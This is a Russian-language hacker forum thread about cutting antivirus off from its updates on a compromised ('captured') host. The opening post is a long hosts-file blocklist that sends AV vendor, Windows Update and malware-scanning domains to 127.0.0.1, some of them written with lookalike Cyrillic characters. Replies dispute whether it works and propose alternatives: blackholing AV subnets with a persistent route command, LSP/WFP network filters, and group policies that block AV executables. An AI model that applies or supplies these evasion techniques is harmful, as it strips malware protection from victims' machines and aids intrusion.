Блочим сервера обновлений AV

[timbo]

Никогда не думали вырубить обновления АВ? Ну например на захваченном хосте. Не? Ну в общем смотри сами, если добавить эти значения в hosts. Делайте как хотите, хоть bat, хоть exe.

127.0.0.1 www.drweb.com
127.0.0.1 liveupdate.symantec.com
127.0.0.1 update.symantec.com
127.0.0.1 virusscan.jotti.org
127.0.0.1 anubis.iseclab.org
127.0.0.1 threatexpert.com
127.0.0.1 clamwin.com
127.0.0.1 avira.com
127.0.0.1 avp.com
127.0.0.1 ca.com
127.0.0.1 customer.symantec.com
127.0.0.1 dispatch.mcafee.com
127.0.0.1 download.mcafee.com
127.0.0.1 f-secure.com
127.0.0.1 kaspersky.com
127.0.0.1 kaspersky-labs.com
127.0.0.1 liveupdate.symantecliveupdate.com
127.0.0.1 mast.mcafee.com
127.0.0.1 mcafee.com
127.0.0.1 microsoft.com
127.0.0.1 ar.atwola.com
127.0.0.1 atdmt.com
127.0.0.1 avp.ch
127.0.0.1 avp.ru
127.0.0.1 awaps.net
127.0.0.1 click.atdmt.com
127.0.0.1 clicks.atdmt.com
127.0.0.1 download.microsoft.com
127.0.0.1 downloads.microsoft.com
127.0.0.1 engine.awaps.net
127.0.0.1 go.microsoft.com
127.0.0.1 msdn.microsoft.com
127.0.0.1 my-etrust.com
127.0.0.1 networkassociates.com
127.0.0.1 office.microsoft.com
127.0.0.1 phx.corporate-ir.net
127.0.0.1 secure.nai.com
127.0.0.1 securityresponse.symantec.com
127.0.0.1 service1.symantec.com
127.0.0.1 spd.atdmt.com
127.0.0.1 support.microsoft.com
127.0.0.1 symantec.com
127.0.0.1 updates.symantec.com
127.0.0.1 us.mcafee.com
127.0.0.1 vil.nai.com
127.0.0.1 viruslist.ru
127.0.0.1 windowsupdate.microsoft.com
127.0.0.1 www.avp.ch
127.0.0.1 www.avp.com
127.0.0.1 www.avp.ru
127.0.0.1 www.awaps.net
127.0.0.1 www.ca.com
127.0.0.1 www.fastclick.net
127.0.0.1 www.f-secure.com
127.0.0.1 www.kaspersky.ru
127.0.0.1 www.mcafee.com
127.0.0.1 www.my-etrust.com
127.0.0.1 www.nai.com
127.0.0.1 www.networkassociates.com
127.0.0.1 www.sophos.com
127.0.0.1 www.symantec.com
127.0.0.1 www.trendmicro.com
127.0.0.1 www.viruslist.ru
127.0.0.1 ftp://ftp.kasperskylab.ru/updates/
127.0.0.1 ftp://ftp.avp.ch/updates/
127.0.0.1 http://www.kaspersky.ru/updates/
127.0.0.1 http://updates1.kaspersky-labs.com/updates/
127.0.0.1 http://updates3.kaspersky-labs.com/updates/
127.0.0.1 http://updates4.kaspersky-labs.com/updates/
127.0.0.1 http://updates2.kaspersky-labs.com/updates/
127.0.0.1 http://updates5.kaspersky-labs.com/updates/
127.0.0.1 http://downloads1.kaspersky-labs.com/updates/
127.0.0.1 http://www.kaspersky-labs.com/updates/
127.0.0.1 ftp://updates3.kaspersky-labs.com/updates/
127.0.0.1 ftp://downloads1.kaspersky-labs.com/updates/
127.0.0.1 www3.ca.com
127.0.0.1 ids.kaspersky-labs.com
127.0.0.1 downloads2.kaspersky-labs.com
127.0.0.1 downloads1.kaspersky-labs.com
127.0.0.1 downloads3.kaspersky-labs.com
127.0.0.1 downloads4.kaspersky-labs.com
127.0.0.1 sophos.com
127.0.0.1 www.viruslist.com
127.0.0.1 viruslist.com
127.0.0.1 www.kaspersky.com
127.0.0.1 nai.com
127.0.0.1 rads.mcafee.com
127.0.0.1 trendmicro.com
127.0.0.1 www.grisoft.com
127.0.0.1 pandasoftware.com
127.0.0.1 virustotal.com э
127.0.0.1 ftp.kаspеrskylab.ru
127.0.0.1 ids.kаspеrsky-labs.com
127.0.0.1 kаspеrsky.com
127.0.0.1 kаspеrsky-labs.com
127.0.0.1 liveupdate.symаntеc.com
127.0.0.1 liveupdate.symаntеcliveupdate.com
127.0.0.1 www.symаntеc.com
127.0.0.1 updаtе.symаntеc.com
127.0.0.1 updаtеs.symаntеc.com
127.0.0.1 updаtеs1.kаspеrsky-labs.com
127.0.0.1 updаtеs2.kаspеrsky-labs.com
127.0.0.1 updаtеs3.kаspеrsky-labs.com
127.0.0.1 www.microsoft.com
127.0.0.1 www.moneybookers.com
127.0.0.1 www.pandasoftware.com
127.0.0.1 www.virustotal.com
127.0.0.1 u20.eset.com
127.0.0.1 u21.eset.com
127.0.0.1 u22.eset.com
127.0.0.1 u23.eset.com
127.0.0.1 u24.eset.com
127.0.0.1 89.202.157.135
127.0.0.1 89.202.157.136
127.0.0.1 89.202.157.137
127.0.0.1 89.202.157.138
127.0.0.1 89.202.157.139
127.0.0.1 u30.eset.com
127.0.0.1 u31.eset.com
127.0.0.1 u32.eset.com
127.0.0.1 u33.eset.com
127.0.0.1 u34.eset.com
127.0.0.1 u35.eset.com
127.0.0.1 u36.eset.com
127.0.0.1 u37.eset.com
127.0.0.1 u38.eset.com
127.0.0.1 u39.eset.com
127.0.0.1 u40.eset.com
127.0.0.1 u41.eset.com
127.0.0.1 u42.eset.com
127.0.0.1 u43.eset.com
127.0.0.1 u44.eset.com
127.0.0.1 u45.eset.com
127.0.0.1 u46.eset.com
127.0.0.1 u47.eset.com
127.0.0.1 u48.eset.com
127.0.0.1 u49.eset.com

 

[Paramedic]

если это и будет работать (в чем я сильно сомневаюсь), то палится всем подряд. подобное проворачивать лучше через LSP или WFP...

 

[Pernat1y]

Так и знал, что в теме etc\hosts будет.
Не знаю, какой упырок решил, что это будет работать, но нет. hosts так не работает:

 

[ColorS]

Так и знал, что в теме etc\hosts будет.
Не знаю, какой упырок решил, что это будет работать, но нет. hosts так не работает:

Посмотреть вложение 6916


Посмотреть вложение 6917

хотя за список серверов спасибо, хотя ему уже 10лет ....

 

[Haunt]

По сертам или по месту расположения/названию групповыми политиками лучше попробуй

 

[test]

А если узнать ASN и лочить всю подсеть AV
например есть x.x.x.x/21 мы берём и отправляем эту подсеть в никуда
route ADD x.x.x.x/21 MASK x.x.x.0 127.0.0.1 /p

может и не будет палится

 

[Adam]

Если они используют сервера AWS либо GOOGLE, будешь как роскомпозор подсеть вырубать, через hosts!? ))

 

[vtx]

по хорошему надо делать на мфп, хоть стоковая юм реализация не позволяет работать на уровне доменных имен, однако это можно запилить на уровне драйвера, правда придется пилить свою реализацию обработки транспорта, и весь этот резольвинг. по крайней мере будет легче чем делать это на голом тди

 

[ridealang]

АВ-ры давно уже нашли обход этому сатрому методу, блок в хостс не прокатит

 

[Haunt]

Групповыми политиками винды по имени ехе поблочьте аверов да и все лол

 

[2c71e9]

Так и знал, что в теме etc\hosts будет.
Не знаю, какой упырок решил, что это будет работать, но нет. hosts так не работает:

Посмотреть вложение 6916


Посмотреть вложение 6917

А ты уверен, что ты верно внес?) В хостс нужно вносить домены, а не урлы

 

[Pernat1y]

А ты уверен, что ты верно внес?) В хостс нужно вносить домены, а не урлы

Спасибо, Кэп

 

[pufik]

против плюшевых ав мб сработать LSP (провайдер-фильтр на основе сокетов)